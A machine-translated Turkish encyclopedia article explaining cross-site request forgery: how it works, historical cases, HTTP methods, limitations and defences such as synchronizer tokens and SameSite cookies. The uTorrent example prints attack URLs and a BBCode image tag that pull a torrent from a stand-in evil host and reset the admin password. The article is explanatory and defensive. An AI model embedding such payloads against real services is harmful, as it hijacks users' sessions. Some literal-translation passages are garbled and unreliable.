Siteler arası istek sahteciliği - Cross-site request forgery

Siteler arası istek sahteciliği, Ayrıca şöyle bilinir tek tıklamayla saldırı veya oturum sürme ve olarak kısaltılır CSRF (bazen telaffuz edilir deniz sörfü[1]) veya XSRF, bir tür kötü niyetli istismar etmek bir İnternet sitesi yetkisiz komutların bir kullanıcı web uygulamasının güvendiği.[2] Kötü amaçlı bir web sitesinin bu tür komutları iletmesinin birçok yolu vardır; özel hazırlanmış görüntü etiketleri, gizli formlar ve JavaScript Örneğin, XMLHttpRequests, kullanıcının etkileşimi ve hatta bilgisi olmadan çalışabilir. Aksine siteler arası komut dosyası oluşturma (XSS), bir kullanıcının belirli bir site için sahip olduğu güvenden yararlanır, CSRF, bir sitenin kullanıcının tarayıcısına olan güvenini kötüye kullanır.

Bir CSRF saldırısında, masum bir son kullanıcı, bir saldırgan tarafından, istemediği bir web isteği göndermesi için kandırılır. Bu, web sitesinde yanlışlıkla istemci veya sunucu veri sızıntısı, oturum durumunun değişmesi veya bir son kullanıcının hesabının manipülasyonunu içerebilecek eylemlerin gerçekleştirilmesine neden olabilir.

Özellikler

Bir CSRF saldırısında saldırganın amacı, masum bir kurbanın, mağdurun ayrıcalıklı erişime sahip olduğu bir web sitesine farkında olmadan kötü amaçla hazırlanmış bir web isteği göndermesine neden olmaktır. Bu web isteği, isteği işleyen web sunucusuna normal görünen URL parametrelerini, tanımlama bilgilerini ve diğer verileri içerecek şekilde tasarlanabilir. Risk altında Web uygulamaları güvenilenlerden gelen girdilere göre eylemler gerçekleştiren ve doğrulanmış Kullanıcıya gerek duymadan kullanıcılar yetki vermek belirli eylem. Tarafından kimliği doğrulanan bir kullanıcı kurabiye kullanıcının klasörüne kaydedildi internet tarayıcısı bilmeden gönderebilir HTTP kullanıcıya güvenen ve dolayısıyla istenmeyen bir eyleme neden olan bir siteye istek.

Web tarayıcılarının genel bir özelliği, belirli bir etki alanına gönderilen herhangi bir web isteğinde belirli bir etki alanı tarafından kullanılan çerezleri otomatik ve görünmez bir şekilde içerecek olmalarıdır. Bu özellik, bir tarayıcı tarafından yapılan herhangi bir web talebinin, kurban bir web sitesinde oturum açtığında oluşturulan tüm çerezleri (oturum çerezleri ve diğerleri dahil) otomatik olarak içereceği için CSRF saldırıları tarafından istismar edilmektedir. Bir kullanıcının yanlışlıkla tarayıcısı üzerinden bir talep göndermesi için kandırılması durumunda, otomatik olarak eklenen bu çerezler sahte talebin web sunucusuna gerçek görünmesine neden olur ve verileri geri verme, oturum durumunu değiştirme veya kurbanın hesabındaki değişiklikler.

Bir CSRF saldırısının işe yaraması için, saldırganın, hedef sayfada bir hesap parolasını değiştirmek gibi belirli bir eylemi gerçekleştiren tekrarlanabilir bir web isteği belirlemesi gerekir. Böyle bir istek belirlendikten sonra, bu kötü niyetli isteği oluşturan bir bağlantı oluşturulabilir ve bu bağlantı, saldırganın denetimi dahilindeki bir sayfaya yerleştirilebilir.[1][3] Bu bağlantı, mağdurun bağlantıya tıklamasına bile gerek kalmayacak şekilde yerleştirilebilir. Örneğin, kurban e-postasını açtığında otomatik olarak yüklenecek olan kurbana gönderilen bir e-postadaki bir html resim etiketi içine yerleştirilmiş olabilir. Kurban bağlantıya tıkladığında, tarayıcısı o web sitesi tarafından kullanılan tüm çerezleri otomatik olarak içerecek ve talebi web sunucusuna gönderecektir. Web sunucusu sahteciliği tanımlayamayacaktır çünkü istek, oturum açmış bir kullanıcı tarafından yapılmıştır ve gerekli tüm çerezleri göndermiştir.

Siteler arası istek sahteciliği, şaşkın milletvekili saldırısı bir web tarayıcısına karşı, çünkü web tarayıcısı daha az ayrıcalıklı bir saldırgan tarafından sahte bir istek göndermek için kandırılır.

CSRF genellikle aşağıdaki özelliklere sahiptir:

  • Bir kullanıcının hesabına güvenen siteleri içerir. Kimlik.
  • Sitenin bu kimliğe olan güvenini kötüye kullanır.
  • Kullanıcının tarayıcısını göndermesi için kandırır HTTP hedef siteye istekler.
  • Aşağıdakilere sahip HTTP isteklerini içerir: yan etkiler.

Tarih

CSRF güvenlik açıkları 2001'den beri bilinmekte ve bazı durumlarda istismar edilmektedir.[4] Çünkü kullanıcının IP adresi, bazı web sitesi günlüklerinde CSRF kanıtı olmayabilir.[2] İstismarlar, en azından kamuya açık olarak ve 2007 itibariyle eksik rapor edilmektedir[5] iyi belgelenmiş birkaç örnek vardı:

  • Netflix 2006'daki web sitesinde CSRF'ye karşı çok sayıda güvenlik açığı vardı; bu, bir saldırganın kurbanın kiralama kuyruğuna bir DVD eklemek, hesaptaki teslimat adresini değiştirmek veya kurbanın oturum açma kimlik bilgilerini tamamen hesaba zarar verecek şekilde değiştirmek gibi eylemler gerçekleştirmesine izin verebilirdi.[6]
  • İnternet bankacılığı web uygulaması Doğrudan ingilizce yasadışı para transferlerine izin veren bir CSRF saldırısına açıktı.[7]
  • Popüler video web sitesi Youtube 2008'de de CSRF'ye açıktı ve bu, herhangi bir saldırganın herhangi bir kullanıcının neredeyse tüm eylemlerini gerçekleştirmesine izin verdi.[7]
  • McAfee Secure ayrıca CSRF'ye karşı savunmasızdı ve saldırganların şirket sistemlerini değiştirmelerine izin verdi. Bu, yeni sürümlerde düzeltilmiştir.[8]

Yönlendiricilerin DNS ayarlarını değiştirme girişimleri de dahil olmak üzere 2018 yılında web özellikli cihazlara yönelik yeni saldırılar gerçekleştirildi. Bazı yönlendirici üreticileri, korumayı iyileştirmek için aceleyle ürün yazılımı güncellemeleri yayınladı ve kullanıcılara riski azaltmak için yönlendirici ayarlarını değiştirmelerini tavsiye etti. Ayrıntılar, "bariz güvenlik nedenleri" gerekçe gösterilerek açıklanmadı.[9]

Misal

Bir Ulusal Güvenlik Açığı Veritabanı CSRF güvenlik açığını açıklayan sayfa

Mağdur oturum açmışken hedef sayfada belirli bir eylemi gerçekleştiren tekrarlanabilir bir bağlantı bulabilen saldırganlar, bu tür bir bağlantıyı kontrol ettikleri bir sayfaya yerleştirebilir ve kurbanı açması için kandırabilir.[1] Saldırı taşıyıcı bağlantısı, mağdurun hedef sitede (örneğin bir tartışma forumu) oturum açarken ziyaret etme olasılığı yüksek bir konuma yerleştirilebilir veya bir HTML e-posta gövdesi veya eki ile gönderilebilir. Gerçek bir CSRF güvenlik açığı uTorrent (CVE-2008-6586 ) web konsolunun şu adresten erişilebilir olmasından yararlandı localhost: 8080 kritik işlemlerin basit bir GET isteği kullanılarak yürütülmesine izin verdi:

Zorla .torrent dosya indirme
http: // localhost: 8080 / gui /? action = add-url & s = http: //evil.example.com/backdoor.torrent
UTorrent yönetici şifresini değiştir
http: // localhost: 8080 / gui /? action = setsetting & s = webui.password & v = eviladmin

Kötü amaçlı, otomatik eylem yerleştirilerek saldırılar başlatıldı HTML görüntü öğeleri forumlarda ve e-posta spam, böylece bu sayfaları ziyaret eden tarayıcılar, çok fazla kullanıcı eylemi olmaksızın sayfaları otomatik olarak açacaktır. Savunmasız uTorrent sürümünü bu sayfaları açarken aynı anda çalıştıran kişiler saldırıya açıktı.

Görüntü etiketlerini kullanan CSRF saldırıları genellikle İnternet forumları, kullanıcıların resim göndermesine izin verilir ancak JavaScript, örneğin kullanarak BBCode:

[img]http: // localhost: 8080 / gui /? action = add-url & s = http: //evil.example.com/backdoor.torrent[/ img]

Yerel uTorrent uygulamasının saldırı bağlantısına şu adresten erişirken: localhost: 8080, tarayıcı ayrıca her zaman otomatik olarak mevcut herhangi bir kurabiye bu alan için. Web tarayıcılarının bu genel özelliği, kullanıcı saldırı sırasında hedef web sitesinde (bu örnekte, yerel uTorrent web arayüzü) oturum açtığı sürece CSRF saldırılarının hedeflenen güvenlik açıklarından yararlanmasını ve düşmanca eylemler gerçekleştirmesini sağlar.

Yukarıda açıklanan uTorrent örneğinde saldırı, uTorrent'in web arayüzünün kullanılmasıyla kolaylaştırılmıştır. GET isteği kritik durum değiştirme işlemleri için (kimlik bilgilerini değiştirme, dosya indirme vb.) RFC  2616 açıkça caydırıyor:

Özellikle, kongre, GET ve HEAD yöntemlerinin, geri getirme dışında bir işlem yapma anlamının OLMAMASI GEREKİR. Bu yöntemler "güvenli" olarak kabul edilmelidir. Bu, kullanıcı aracılarının POST, PUT ve DELETE gibi diğer yöntemleri özel bir şekilde temsil etmesine olanak tanır, böylece kullanıcı, muhtemelen güvenli olmayan bir eylemin talep edildiğinden haberdar edilir.

Bu varsayım nedeniyle, birçok mevcut CSRF önleme mekanizması web çerçeveleri niyet değil örtmek GET istekleri, bunun yerine korumayı yalnızca durumu değiştirmesi amaçlanan HTTP yöntemlerine uygulayın.[10]

Sahte oturum açma istekleri

Bir saldırgan, saldırganın kimlik bilgilerini kullanarak kurbanı hedef web sitesinde oturum açma talebinde bulunabilir; bu olarak bilinir CSRF'ye giriş yap. Login CSRF, çeşitli yeni saldırıları mümkün kılar; örneğin, bir saldırgan daha sonra yasal kimlik bilgileriyle sitede oturum açabilir ve hesaba kaydedilen etkinlik geçmişi gibi özel bilgileri görüntüleyebilir. Bu saldırıya karşı gösterildi Google[11] ve Yahoo.[12]

HTTP fiilleri ve CSRF

Türüne bağlı olarak, HTTP istek yöntemleri CSRF saldırılarına karşı duyarlılıklarında farklılık gösterir (bunların ele alınmasındaki farklılıklar nedeniyle internet tarayıcıları ). Bu nedenle, bir saldırıya karşı koruyucu önlemler, HTTP isteğinin yöntemine bağlıdır.

  • İçinde HTTP GET CSRF istismarı, yukarıda açıklanan yöntemler kullanılarak önemsizdir. köprü değiştirilmiş parametreleri içerir ve otomatik olarak bir IMG etiketi. Bununla birlikte, HTTP belirtimine göre, GET bir güvenli yöntem yani, kullanıcının uygulamadaki durumunu önemli ölçüde değiştirmez. Bu tür işlemler için GET kullanan uygulamalar, HTTP POST veya anti-CSRF koruması kullanın.
  • HTTP POST CSRF'ye yönelik güvenlik açığı, kullanım senaryosuna bağlıdır:
    • En basit POST biçiminde, veri olarak kodlanmış sorgu dizesi (alan1 = değer1 & alan2 = değer2) CSRF saldırısı, basit bir HTML formu CSRF karşıtı önlemler uygulanmalıdır.
    • Veriler başka bir biçimde gönderilirse (JSON, XML ) standart bir yöntem, kullanarak bir POST isteği yayınlamaktır XMLHttpRequest CSRF saldırıları ile Aynı menşe politikası (SOP) ve Kaynaklar arası kaynak paylaşımı (CORS); basit bir içerikten rastgele içerik göndermek için bir teknik var HTML formu kullanma ENCTYPE nitelik; böyle sahte bir talep meşru olanlardan şu şekilde ayırt edilebilir: metin / düz içerik türü, ancak bu sunucuda uygulanmazsa CSRF yürütülebilir[13][14]
  • diğer HTTP yöntemleri (PUT, DELETE vb.) yalnızca XMLHttpRequest ile Aynı menşe politikası (SOP) ve Kaynaklar arası kaynak paylaşımı (CORS) ve CSRF'yi önlemek; ancak bu önlemler, kullanımlarını açıkça devre dışı bırakan web sitelerinde etkin olmayacaktır. Erişim Kontrolü-İzin Ver-Menşei: * başlık

CSRF'ye yönelik diğer yaklaşımlar

Ek olarak, tipik olarak statik bir saldırı türü olarak tanımlanırken, CSRF, dinamik olarak bir veri yükünün bir parçası olarak da oluşturulabilir. siteler arası komut dosyası oluşturma saldırının gösterdiği gibi Samy solucan veya site dışı içerik yoluyla sızdırılan ve kötü amaçlı bir URL olarak bir hedefe gönderilen oturum bilgilerinden anında oluşturulur. CSRF belirteçleri, bir saldırgan tarafından bir istemciye de gönderilebilir. oturum sabitleme veya diğer güvenlik açıkları veya kaba kuvvet saldırısı yoluyla tahmin edilen, binlerce başarısız istek oluşturan kötü amaçlı bir sayfada işlenir. "Dinamik CSRF" saldırı sınıfı veya oturuma özgü sahtecilik için istemci başına bir yük kullanma, açıklandı[15] 2009'da Nathan Hamiel ve Shawn Moyer tarafından BlackHat Brifinglerinde,[16] ancak sınıflandırma henüz daha geniş çapta benimsenmiş değil.

Dinamik CSRF saldırıları oluşturmak için yeni bir vektör, Ocak 2012'de yerel OWASP bölüm toplantısında Oren Ofer tarafından sunuldu - "AJAX Çekiç - Dinamik CSRF".[17][18]

Etkileri

CSRF güvenlik açıkları için önem ölçütleri yayınlandı. uzaktan kod yürütme ile kök ayrıcalıkları[19] yanı sıra bir güvenlik açığını tehlikeye atabilecek kök sertifika tamamen zayıflatacak Açık Anahtar Altyapısı.[20]

Sınırlamalar

Siteler arası istek sahteciliğinin başarılı olması için birkaç şeyin olması gerekir:

  1. Saldırgan, siteyi kontrol etmeyen bir siteyi hedeflemelidir. yönlendiren başlığı veya bir tarayıcıya veya eklentiye sahip bir kurban yönlendiren sahtekarlığı.[21]
  2. Saldırgan, hedef sitede bir form gönderimi veya yan etkileri olan, bir şeyler yapan (örneğin, para aktaran veya kurbanın e-posta adresini veya şifresini değiştiren) bir form gönderimi bulmalıdır.
  3. Saldırgan, tüm formlar veya URL girişleri için doğru değerleri belirlemelidir; bunlardan herhangi birinin saldırganın tahmin edemeyeceği gizli kimlik doğrulama değerleri veya kimlikleri olması gerekiyorsa, saldırı büyük olasılıkla başarısız olacaktır (saldırgan tahminlerinde aşırı derecede şanslı değilse).
  4. Saldırgan, mağdur hedef sitede oturum açarken kurbanı kötü amaçlı kod içeren bir web sayfasına çekmelidir.

Saldırı kördür: saldırgan, hedef web sitesinin sahte taleplere yanıt olarak kurbana ne gönderdiğini göremez; siteler arası komut dosyası oluşturma veya hedef web sitesinde başka bir hata. Benzer şekilde, saldırgan yalnızca ilk sahte talepten sonra gelen tüm bağlantıları hedefleyebilir veya bu sonraki bağlantılar veya formlar benzer şekilde tahmin edilebilirse, herhangi bir formu gönderebilir. (Bir sayfaya birden çok resim ekleyerek veya tıklamalar arasında bir gecikme oluşturmak için JavaScript kullanarak birden çok hedefin simülasyonu yapılabilir.)

Bu kısıtlamalar göz önüne alındığında, bir saldırgan, oturum açmış kurbanları veya saldırıya açık form gönderimlerini bulmakta zorluk yaşayabilir.[kaynak belirtilmeli ] Öte yandan, saldırı girişimlerinin montajı kolaydır ve kurbanlar için görünmezdir ve uygulama tasarımcıları, örneğin şifre kırma sözlük saldırılarına göre CSRF saldırılarına daha az aşina ve hazırlıklıdır.

Önleme

Çoğu CSRF önleme tekniği, web uygulamasının yetkisiz konumlardan gelen istekleri algılamasına olanak tanıyan isteklere ek kimlik doğrulama verileri yerleştirerek çalışır.

Eşitleyici jeton kalıbı

Eşitleyici jeton kalıbı (STP), her istek için bir belirteç, gizli ve benzersiz değerin web uygulaması tarafından tüm HTML formlarına gömüldüğü ve sunucu tarafında doğrulandığı bir tekniktir. Belirteç, tahmin edilemezlik ve benzersizlik sağlayan herhangi bir yöntemle üretilebilir (örneğin, bir karma zincir rastgele tohum). Bu nedenle saldırgan, kimlik doğrulama isteklerine doğru bir belirteç yerleştiremez.[1][22][23]

STP örneği Django HTML biçiminde:

 type ="gizli" isim ="csrfmiddlewaretoken" değer ="KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt" />

STP, yalnızca HTML'ye dayandığı için en uyumlu olanıdır, ancak her istekte jetonun geçerliliğini kontrol etmeyle ilişkili yük nedeniyle sunucu tarafında biraz karmaşıklık getirir. Belirteç benzersiz ve öngörülemez olduğu için, aynı zamanda uygun olay sırasını (ör. Ekran 1, sonra 2, sonra 3) zorlayarak kullanılabilirlik sorununu ortaya çıkarır (ör. Kullanıcı birden çok sekme açar). İstek başına CSRF belirteci yerine oturum başına CSRF belirteci kullanılarak gevşetilebilir.

Çerezden başlığa jeton

Kullanan web uygulamaları JavaScript operasyonlarının çoğu için aşağıdaki CSRF önleme tekniğini kullanabilir:

  • İlişkili bir sunucu oturumu olmayan ilk ziyarette, web uygulaması, çapraz kaynak talepleri sırasında sağlanmaması için uygun şekilde kapsamı belirlenmiş bir tanımlama bilgisi ayarlar. Çerez, tipik olarak, web oturumunun ömrü boyunca aynı kalabilen rastgele bir belirteç içerir.
Set-Çerez: csrf_token = i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; Bitiş tarihi = Per, 23-Tem-2015 10:25:33 GMT; Maksimum Yaş = 31449600; Yol = /; Etki Alanı = .wikipedia.org; SameSite = Lax; Güvenli
  • JavaScript müşteri tarafında faaliyet göstermek, değerini okur ve bunu özel bir HTTP başlığı her işlem talebiyle birlikte gönderilir
X-Csrf-Belirteci: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql
  • Sunucu, belirtecin varlığını ve bütünlüğünü doğrular

Bu tekniğin güvenliği, yalnızca JavaScript başlangıçta tanımlama bilgisini ayarlayan sunucuya bir HTTPS bağlantısının istemci tarafında çalıştırıldığında, tanımlama bilgisinin değerini okuyabilir. Sahte bir dosyadan veya e-postadan çalıştırılan JavaScript, özel başlığa kopyalamak için çerez değerini başarıyla okuyamamalıdır. Olsa bile csrf belirteci kurabiye sahte istek ile otomatik olarak gönderilecektir, sunucu yine de geçerli bir X-Csrf-Jetonu başlık.

CSRF belirtecinin kendisi benzersiz ve tahmin edilemez olmalıdır. Rastgele oluşturulabilir veya oturum belirteci kullanma HMAC:

csrf_token = HMAC (session_token, application_secret)

CSRF jeton tanımlama bilgisi, httpOnly tarafından okunması amaçlandığı için bayrak JavaScript tasarım gereği.

Bu teknik, birçok modern çerçeve tarafından uygulanmaktadır. Django[24] ve AngularJS.[25] Belirteç tüm kullanıcı oturumu boyunca sabit kaldığından, AJAX uygulamalar, ancak web uygulamasındaki olayların sırasını zorlamaz.

Bu tekniğin sağladığı koruma, hedef web sitesi devre dışı bırakır onun aynı menşeli politika aşağıdaki tekniklerden birini kullanarak:

  • clientaccesspolicy.xml Silverlight denetimlerine istenmeyen erişim sağlayan dosya[26]
  • crossdomain.xml Flash filmlere istenmeyen erişim sağlayan dosya[27]

Çift Çerez Gönderme

Çerezden başlığa yaklaşımına benzer şekilde, ancak JavaScript'i dahil etmeden, bir site bir CSRF belirtecini çerez olarak ayarlayabilir ve ayrıca bunu her HTML formuna gizli bir alan olarak ekleyebilir. Form gönderildiğinde site, çerez simgesinin form jetonuyla eşleşip eşleşmediğini kontrol edebilir. Aynı kaynak ilkesi, bir saldırganın hedef etki alanında tanımlama bilgileri okumasını veya ayarlamasını engeller, bu nedenle kendi hazırlanmış formlarına geçerli bir simge koyamaz.[28]

Bu tekniğin Eşitleyici modeline göre avantajı, belirtecin sunucuda depolanmasına gerek olmamasıdır.

SameSite çerez özelliği

Ek bir "SameSite" özniteliği, sunucu bir tanımlama bilgisi ayarladığında ve tarayıcıya tanımlama bilgisinin siteler arası isteklere eklenip eklenmeyeceğini bildirerek eklenebilir. Bu öznitelik "katı" olarak ayarlanırsa, çerez yalnızca aynı kaynaklı isteklerde gönderilir ve CSRF'yi etkisiz hale getirir. Ancak, bu, tarayıcının özelliği tanımasını ve doğru bir şekilde uygulamasını ve ayrıca tanımlama bilgisinin "Güvenli" bayrağına sahip olmasını gerektirir.[29]

İstemci tarafı koruma önlemleri

RequestPolicy gibi tarayıcı uzantıları ( Mozilla Firefox ) veya uMatrix (hem Firefox hem de Google Chrome /Krom ) siteler arası istekler için varsayılan reddetme politikası sağlayarak CSRF'yi önleyebilir. Ancak bu, birçok web sitesinin normal çalışmasına önemli ölçüde müdahale edebilir. CsFire uzantısı (ayrıca Firefox için), kimlik doğrulama bilgilerini siteler arası isteklerden kaldırarak CSRF'nin etkisini normal taramayı daha az etkileyerek azaltabilir.

NoScript Firefox için uzantı, güvenilen siteleri güvenilmeyen sitelerden ayırarak ve güvenilmeyen siteler tarafından güvenilen sitelere gönderilen POST isteklerinden kimlik doğrulama ve yükleri kaldırarak CSRF tehditlerini azaltır. NoScript'teki Application Boundary Enforcer modülü ayrıca internet sayfalarından yerel sitelere (örn. Localhost) gönderilen istekleri engelleyerek yerel hizmetlere (uTorrent gibi) veya yönlendiricilere yönelik CSRF saldırılarını önler.

Firefox için Kendi Kendini Yok Eden Çerezler uzantısı doğrudan CSRF'den koruma sağlamaz, ancak çerezleri artık açık bir sekmeyle ilişkilendirilmedikleri anda silerek saldırı penceresini azaltabilir.

Diğer teknikler

Geçmişte CSRF'nin önlenmesi için çeşitli başka teknikler kullanılmış veya önerilmiştir:

  • İsteğin başlıklarının içerdiğinin doğrulanması X-İstenen-Birlikte (tarafından kullanılan raylar üzerinde yakut v2.0'dan önce ve Django v1.2.5'ten önce) veya HTTP'yi kontrol etme Referer başlık ve / veya HTTP Menşei başlık.[30] Ancak bu güvensizdir - tarayıcı eklentileri ve yeniden yönlendirmelerden oluşan bir kombinasyon, bir saldırganın herhangi bir web sitesine bir istek üzerine özel HTTP başlıkları sağlamasına ve dolayısıyla sahte bir isteğe izin vermesine izin verebilir.[31][32]
  • Kontrol etmek HTTP Referer başlık Bellek gereksinimlerini artırmadığı için isteğin yetkili bir sayfadan gelip gelmediğini görmek için genellikle gömülü ağ aygıtları için kullanılır. Ancak, Referer üstbilgi yetkisiz olarak değerlendirilmelidir çünkü bir saldırgan, Referer FTP veya HTTPS URL'lerinden istek göndererek üstbilgi. Bu katı Referer doğrulama, tarayıcılarda veya proxy'lerde sorunlara neden olabilir. Referer gizlilik nedeniyle başlık. Ayrıca, eski Flash sürümleri (9.0.18'den önce), kötü amaçlı Flash'ın rastgele HTTP istek başlıklarıyla GET veya POST istekleri oluşturmasına izin verir. CRLF Enjeksiyonu.[33] Bir istemcideki benzer CRLF enjeksiyon güvenlik açıkları, bir HTTP isteğinin yönlendiricisini yanıltmak için kullanılabilir.
  • İLETİ istek yöntemi bir süredir URL'deki parametreleri kullanarak (GET yöntemini kullanarak) önemsiz CSRF saldırılarına karşı bağışık olarak algılandı. Bununla birlikte, hem POST hem de diğer herhangi bir HTTP yöntemi artık kullanılarak kolayca yürütülebilir. XMLHttpRequest. Beklenmeyen GET isteklerini filtrelemek, kötü amaçlı görüntü URL'leri veya bağlantı adresleri kullanan siteler arası saldırılar ve siteler arası bilgi sızıntısı gibi bazı belirli saldırıları hala engellemektedir. <script> elementler (JavaScript kaçırma); aynı zamanda (güvenlikle ilgili olmayan) agresif sorunları da önler web tarayıcıları ve bağlantı önceden getiriliyor.[1]

Siteler arası komut dosyası oluşturma (XSS) güvenlik açıkları (aynı etki alanında çalışan diğer uygulamalarda bile), saldırganların esasen tüm CSRF engellemelerini atlamasına izin verir.[34]

Ayrıca bakınız

Referanslar

  1. ^ a b c d e Shiflett, Chris (13 Aralık 2004). "Güvenlik Köşesi: Siteler Arası Talep Sahtekarlıkları". php | Architect (shiflett.org aracılığıyla). Alındı 2008-07-03.
  2. ^ a b Ristic, Ivan (2005). Apache Güvenliği. O'Reilly Media. s.280. ISBN  0-596-00724-8.
  3. ^ "CSRF (Siteler arası istek sahteciliği) nedir? Eğitim ve Örnekler". portswigger.net. Alındı 2019-11-04.
  4. ^ Burns, Jesse (2005). "Siteler Arası İstek Sahteciliği: Yaygın Bir Web Zayıflığına Giriş" (PDF). Bilgi Güvenliği Ortakları, LLC. Alındı 2011-12-12.
  5. ^ Christey, Steve; Martin, Robert A. (22 Mayıs 2007). "CVE'deki Güvenlik Açığı Türü Dağılımları (sürüm 1.1)". MITRE Corporation. Alındı 2008-06-07.
  6. ^ Washkuch Jr., Frank (17 Ekim 2006). "Netflix siteler arası istek sahteciliği deliğini düzeltir". SC Dergisi. Alındı 2019-02-11.
  7. ^ a b William Zeller; Edward W. Felten (Ekim 2008). "Siteler Arası Talep Sahtekarlıkları: Suistimal ve Önleme" (PDF). Alındı 29 Mayıs 2015.
  8. ^ Mike, Bailey (2009). "CSRF: Evet, Hala Çalışıyor ..." (PDF). DEFCON.
  9. ^ "Güvenlik Danışmanlığı: CSRF ve DNS / DHCP / Web Saldırıları". Draytek. Mayıs 2018. Alındı 18 Mayıs 2018.
  10. ^ "Siteler Arası Sahtecilik İsteğinde Koruma | Django belgeleri | Django". docs.djangoproject.com. Alındı 2015-08-21.
  11. ^ Adam Barth, Collin Jackson ve John C. Mitchell, Siteler Arası İstek Sahteciliği için Sağlam Savunmalar, 15. ACM Bilgisayar ve İletişim Güvenliği Konferansı Bildirileri, ACM 2008
  12. ^ Joseph Foulds, Pasif izleme giriş isteği sahteciliği, Yahoo Arşivlendi 2014-12-22 de Wayback Makinesi
  13. ^ "XML Gövdeli POST İstekleri İçin Siteler Arası İstek Sahteciliği". Pentestmonkey. Alındı 4 Eylül 2015.
  14. ^ Sheeraj Shah (2008). "Web 2.0 Hacking, Ajax ve Web Hizmetlerini Savunuyor" (PDF). HITB. Alındı 4 Eylül 2015.
  15. ^ "Güvenlik Düzeltmesi - Silahlaştırma Web 2.0".
  16. ^ Dinamik CSRF Arşivlendi 2010-02-13 de Wayback Makinesi
  17. ^ Owasp.org: İsrail 2012/01: AJAX Hammer - CSRF Saldırıları için AJAX'dan Yararlanma
  18. ^ Yüklemeler - hasc-research - hasc-research - Google Project Hosting. Code.google.com (2013-06-17). Erişim tarihi: 2014-04-12.
  19. ^ "Güvenlik Açığı Notu VU # 584089 - cPanel XSRF güvenlik açıkları".
  20. ^ "Güvenlik Açığı Notu VU # 264385 - OpenCA, Siteler arası istek sahteciliğine (XSRF) izin verir".
  21. ^ "Gelişmiş siteler arası saldırı önleme". Espacenet. Avrupa Patent Ofisi. Alındı 21 Kasım 2019.
  22. ^ "Siteler Arası İstek Sahteciliği (CSRF) Önleme Hile Sayfası". OWASP. Alındı 2019-07-19.
  23. ^ "Valhalla Makaleleri - Siteler Arası İstek Sahteciliği: Sade".
  24. ^ "Siteler Arası Talep Sahtekarlığı koruması". Django. Arşivlenen orijinal 2015-01-20 tarihinde. Alındı 2015-01-20.
  25. ^ "Siteler Arası İstek Sahteciliği (XSRF) Koruması". AngularJS. Alındı 2015-01-20.
  26. ^ "Bir Hizmeti Etki Alanı Sınırları Arasında Kullanılabilir Hale Getirme".
  27. ^ Adamski, Lucas. "Flash Player için etki alanları arası politika dosyası kullanım önerileri - Adobe Developer Connection".
  28. ^ "Double Submit Cookie savunması". OWASP.
  29. ^ "SameSite çerezleri". Mozilla.
  30. ^ Kaynak Başlık Teklifi Arşivlendi 2016-03-08 de Wayback Makinesi. People.mozilla.org. Erişim tarihi: 2013-07-29.
  31. ^ "Django 1.2.5 sürüm notları". Django.
  32. ^ "Siteler Arası İstek Sahteciliği (CSRF)". OWASP, Açık Web Uygulama Güvenliği Projesi. 4 Eylül 2012. Alındı 11 Eylül 2012.
  33. ^ "Secunia Danışma SA22467". Secunia. 19 Ekim 2006. Alındı 11 Eylül 2012.
  34. ^ Schneider, Christian. "CSRF ve aynı kökenli XSS". Arşivlenen orijinal 2012-08-14 tarihinde. Alındı 2012-04-21.

Dış bağlantılar